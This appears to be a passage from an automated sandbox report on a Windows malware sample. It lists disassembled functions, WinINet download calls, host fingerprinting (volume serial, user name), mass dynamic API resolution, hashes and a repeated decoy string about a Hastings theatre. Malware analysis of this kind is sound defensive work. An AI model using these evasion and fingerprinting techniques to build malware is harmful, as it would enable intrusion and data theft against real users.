                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46D3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4712
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4688
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B47B5
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46B2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4728
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46A7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 2d9b9d12341dd91ad2d0c07de9497cac151c33d0cde0eb60346d760ff31a11b9
                                  • Instruction ID: a6db5eeed6992a1f89079bf7eb97329111ea98db24c451a31fe0b182d546d6c5
                                  • Opcode Fuzzy Hash: 2d9b9d12341dd91ad2d0c07de9497cac151c33d0cde0eb60346d760ff31a11b9
                                  • Instruction Fuzzy Hash: 53416560FE261C7EC63CF7E6886EE9D77635F42749F01504AF80952B80CBB245884DAA
                                  Function 006B62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 6b62d0-6b635b call 6caab0 call 6b4800 call 6caa50 InternetOpenA StrCmpCA 1040 6b635d 1033->1040 1041 6b6364-6b6368 1033->1041 1040->1041 1042 6b6559-6b6575 call 6caab0 call 6cab10 * 2 1041->1042 1043 6b636e-6b6392 InternetConnectA 1041->1043 1062 6b6578-6b657d 1042->1062 1045 6b6398-6b639c 1043->1045 1046 6b654f-6b6553 InternetCloseHandle 1043->1046 1048 6b63aa 1045->1048 1049 6b639e-6b63a8 1045->1049 1046->1042 1050 6b63b4-6b63e2 HttpOpenRequestA 1048->1050 1049->1050 1052 6b63e8-6b63ec 1050->1052 1053 6b6545-6b6549 InternetCloseHandle 1050->1053 1055 6b63ee-6b640f InternetSetOptionA 1052->1055 1056 6b6415-6b6455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 6b647c-6b649b call 6c8ad0 1056->1058 1059 6b6457-6b6477 call 6caa50 call 6cab10 * 2 1056->1059 1067 6b6519-6b6539 call 6caa50 call 6cab10 * 2 1058->1067 1068 6b649d-6b64a4 1058->1068 1059->1062 1067->1062 1069 6b6517-6b653f InternetCloseHandle 1068->1069 1070 6b64a6-6b64d0 InternetReadFile 1068->1070 1069->1053 1073 6b64db 1070->1073 1074 6b64d2-6b64d9 1070->1074 1073->1069 1074->1073 1078 6b64dd-6b6515 call 6cacc0 call 6cabb0 call 6cab10 1074->1078 1078->1070
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                    • Part of subcall function 006B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • InternetOpenA.WININET(006D0DFF,00000001,00000000,00000000,00000000), ref: 006B6331
                                  • StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B6353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B6385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B63D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006B640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006B6421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006B644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006B64BD
                                  • InternetCloseHandle.WININET(00000000), ref: 006B653F
                                  • InternetCloseHandle.WININET(00000000), ref: 006B6549
                                  • InternetCloseHandle.WININET(00000000), ref: 006B6553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 7ee9a8c1fe3ec2d449fcaadda5302d55b268f06d6df2b54358708721311550a0
                                  • Instruction ID: d912f63a96d05c71219c12babcc62a4077c0cf62d7e0a9d04ac36aac592d18ed
                                  • Opcode Fuzzy Hash: 7ee9a8c1fe3ec2d449fcaadda5302d55b268f06d6df2b54358708721311550a0
                                  • Instruction Fuzzy Hash: 617160B1A04218ABDB24DFD0DC59FEEB776EB44700F108199F2066B290DBB4AE84DF55
                                  Function 006C7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 6c7690-6c76da GetWindowsDirectoryA 1357 6c76dc 1356->1357 1358 6c76e3-6c7757 GetVolumeInformationA call 6c8e90 * 3 1356->1358 1357->1358 1365 6c7768-6c776f 1358->1365 1366 6c778c-6c77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 6c7771-6c778a call 6c8e90 1365->1367 1369 6c77b8-6c77e8 wsprintfA call 6caa50 1366->1369 1370 6c77a9-6c77b6 call 6caa50 1366->1370 1367->1365 1377 6c780e-6c781e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006C76D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006C770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C779A
                                  • wsprintfA.USER32 ref: 006C77D0
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 72ed1756915a5c127f531e66db82e6878087920ada5f1b6fdc2f920f632b2267
                                  • Instruction ID: c4b386a149682fad84b03033f5ade9a6cc91313830712bffb1781a709d6b54ee
                                  • Opcode Fuzzy Hash: 72ed1756915a5c127f531e66db82e6878087920ada5f1b6fdc2f920f632b2267
                                  • Instruction Fuzzy Hash: 714173B1D082489BDB10DF94DC85FEEBBB9EB48704F10419DF609AB280D775AA44CFA5
                                  Function 006C79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006B11B7), ref: 006C7A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 006C7A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 8ae88e6af5f7cf4826a98b00287100442a40a812400c416358fa2978fcff6a46
                                  • Instruction ID: 2861e604934c7c78a3ae79b60c52abaf8d42b3b6c5d32a640752eebc9364a896
                                  • Opcode Fuzzy Hash: 8ae88e6af5f7cf4826a98b00287100442a40a812400c416358fa2978fcff6a46
                                  • Instruction Fuzzy Hash: FEF04FB1948209EFC700DFD8DD45FAEFBB8EB49711F10021AF615A2780C77555008BA1
                                  Function 006B1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 4cefa402f675887c8dc4b646136626f4da8127204a0fca1ef2f1085bc8e697a8
                                  • Instruction ID: bf20280824d216df511beadf91e772eb2dbf2875bddff0c9157c760f2fc3af04
                                  • Opcode Fuzzy Hash: 4cefa402f675887c8dc4b646136626f4da8127204a0fca1ef2f1085bc8e697a8
                                  • Instruction Fuzzy Hash: 8DD05E7490C30CABCB00DFE0988DADDBB78FB08615F100594D90572740EA30A481CB65
                                  Function 006C9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 6c9f20-6c9f2a 634 6ca346-6ca3da LoadLibraryA * 8 633->634 635 6c9f30-6ca341 GetProcAddress * 43 633->635 636 6ca3dc-6ca451 GetProcAddress * 5 634->636 637 6ca456-6ca45d 634->637 635->634 636->637 638 6ca526-6ca52d 637->638 639 6ca463-6ca521 GetProcAddress * 8 637->639 640 6ca52f-6ca5a3 GetProcAddress * 5 638->640 641 6ca5a8-6ca5af 638->641 639->638 640->641 642 6ca5b5-6ca642 GetProcAddress * 6 641->642 643 6ca647-6ca64e 641->643 642->643 644 6ca72f-6ca736 643->644 645 6ca654-6ca72a GetProcAddress * 9 643->645 646 6ca738-6ca7ad GetProcAddress * 5 644->646 647 6ca7b2-6ca7b9 644->647 645->644 646->647 648 6ca7ec-6ca7f3 647->648 649 6ca7bb-6ca7e7 GetProcAddress * 2 647->649 650 6ca825-6ca82c 648->650 651 6ca7f5-6ca820 GetProcAddress * 2 648->651 649->648 652 6ca922-6ca929 650->652 653 6ca832-6ca91d GetProcAddress * 10 650->653 651->650 654 6ca98d-6ca994 652->654 655 6ca92b-6ca988 GetProcAddress * 4 652->655 653->652 656 6ca9ae-6ca9b5 654->656 657 6ca996-6ca9a9 GetProcAddress 654->657 655->654 658 6caa18-6caa19 656->658 659 6ca9b7-6caa13 GetProcAddress * 4 656->659 657->656 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01465C50), ref: 006C9F3D
                                  • GetProcAddress.KERNEL32(74DD0000,01465B50), ref: 006C9F55
                                  • GetProcAddress.KERNEL32(74DD0000,01479610), ref: 006C9F6E
                                  • GetProcAddress.KERNEL32(74DD0000,01479688), ref: 006C9F86
                                  • GetProcAddress.KERNEL32(74DD0000,014796D0), ref: 006C9F9E
                                  • GetProcAddress.KERNEL32(74DD0000,014796A0), ref: 006C9FB7
                                  • GetProcAddress.KERNEL32(74DD0000,0146B798), ref: 006C9FCF
                                  • GetProcAddress.KERNEL32(74DD0000,0147D410), ref: 006C9FE7
                                  • GetProcAddress.KERNEL32(74DD0000,0147D440), ref: 006CA000
                                  • GetProcAddress.KERNEL32(74DD0000,0147D3F8), ref: 006CA018
                                  • GetProcAddress.KERNEL32(74DD0000,0147D5A8), ref: 006CA030
                                  • GetProcAddress.KERNEL32(74DD0000,01465C10), ref: 006CA049
                                  • GetProcAddress.KERNEL32(74DD0000,01465DB0), ref: 006CA061
                                  • GetProcAddress.KERNEL32(74DD0000,01465DF0), ref: 006CA079
                                  • GetProcAddress.KERNEL32(74DD0000,01465B70), ref: 006CA092
                                  • GetProcAddress.KERNEL32(74DD0000,0147D458), ref: 006CA0AA
                                  • GetProcAddress.KERNEL32(74DD0000,0147D4B8), ref: 006CA0C2
                                  • GetProcAddress.KERNEL32(74DD0000,0146B810), ref: 006CA0DB
                                  • GetProcAddress.KERNEL32(74DD0000,01465E10), ref: 006CA0F3
                                  • GetProcAddress.KERNEL32(74DD0000,0147D4E8), ref: 006CA10B
                                  • GetProcAddress.KERNEL32(74DD0000,0147D488), ref: 006CA124
                                  • GetProcAddress.KERNEL32(74DD0000,0147D548), ref: 006CA13C
                                  • GetProcAddress.KERNEL32(74DD0000,0147D4D0), ref: 006CA154
                                  • GetProcAddress.KERNEL32(74DD0000,01465C70), ref: 006CA16D
                                  • GetProcAddress.KERNEL32(74DD0000,0147D428), ref: 006CA185
                                  • GetProcAddress.KERNEL32(74DD0000,0147D470), ref: 006CA19D
                                  • GetProcAddress.KERNEL32(74DD0000,0147D4A0), ref: 006CA1B6
                                  • GetProcAddress.KERNEL32(74DD0000,0147D518), ref: 006CA1CE
                                  • GetProcAddress.KERNEL32(74DD0000,0147D500), ref: 006CA1E6
                                  • GetProcAddress.KERNEL32(74DD0000,0147D530), ref: 006CA1FF
                                  • GetProcAddress.KERNEL32(74DD0000,0147D560), ref: 006CA217
                                  • GetProcAddress.KERNEL32(74DD0000,0147D578), ref: 006CA22F
                                  • GetProcAddress.KERNEL32(74DD0000,0147D590), ref: 006CA248
                                  • GetProcAddress.KERNEL32(74DD0000,0147A360), ref: 006CA260
                                  • GetProcAddress.KERNEL32(74DD0000,0147D050), ref: 006CA278
                                  • GetProcAddress.KERNEL32(74DD0000,0147D0E0), ref: 006CA291
                                  • GetProcAddress.KERNEL32(74DD0000,01465CB0), ref: 006CA2A9
                                  • GetProcAddress.KERNEL32(74DD0000,0147CE40), ref: 006CA2C1
                                  • GetProcAddress.KERNEL32(74DD0000,014657B0), ref: 006CA2DA
                                  • GetProcAddress.KERNEL32(74DD0000,0147CF60), ref: 006CA2F2
                                  • GetProcAddress.KERNEL32(74DD0000,0147D008), ref: 006CA30A
                                  • GetProcAddress.KERNEL32(74DD0000,01465750), ref: 006CA323
                                  • GetProcAddress.KERNEL32(74DD0000,014659B0), ref: 006CA33B
                                  • LoadLibraryA.KERNEL32(0147CF90,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA34D
                                  • LoadLibraryA.KERNEL32(0147CE58,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA35E
                                  • LoadLibraryA.KERNEL32(0147CF78,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA370
                                  • LoadLibraryA.KERNEL32(0147D020,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA382
                                  • LoadLibraryA.KERNEL32(0147CF18,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA393
                                  • LoadLibraryA.KERNEL32(0147CFD8,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA3A5
                                  • LoadLibraryA.KERNEL32(0147CDF8,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA3B7
                                  • LoadLibraryA.KERNEL32(0147CFA8,?,006C5EF3,006D0AEB,?,?,?,?,?,?,?,?,?,?,006D0AEA,006D0AE7), ref: 006CA3C8
                                  • GetProcAddress.KERNEL32(75290000,01465930), ref: 006CA3EA
                                  • GetProcAddress.KERNEL32(75290000,0147CE10), ref: 006CA402
                                  • GetProcAddress.KERNEL32(75290000,01479168), ref: 006CA41A
                                  • GetProcAddress.KERNEL32(75290000,0147CE88), ref: 006CA433
                                  • GetProcAddress.KERNEL32(75290000,01465830), ref: 006CA44B
                                  • GetProcAddress.KERNEL32(734C0000,0146B7E8), ref: 006CA470
                                  • GetProcAddress.KERNEL32(734C0000,01465790), ref: 006CA489
                                  • GetProcAddress.KERNEL32(734C0000,0146B900), ref: 006CA4A1
                                  • GetProcAddress.KERNEL32(734C0000,0147CFC0), ref: 006CA4B9
                                  • GetProcAddress.KERNEL32(734C0000,0147D068), ref: 006CA4D2
                                  • GetProcAddress.KERNEL32(734C0000,014659D0), ref: 006CA4EA
                                  • GetProcAddress.KERNEL32(734C0000,01465990), ref: 006CA502
                                  • GetProcAddress.KERNEL32(734C0000,0147CFF0), ref: 006CA51B
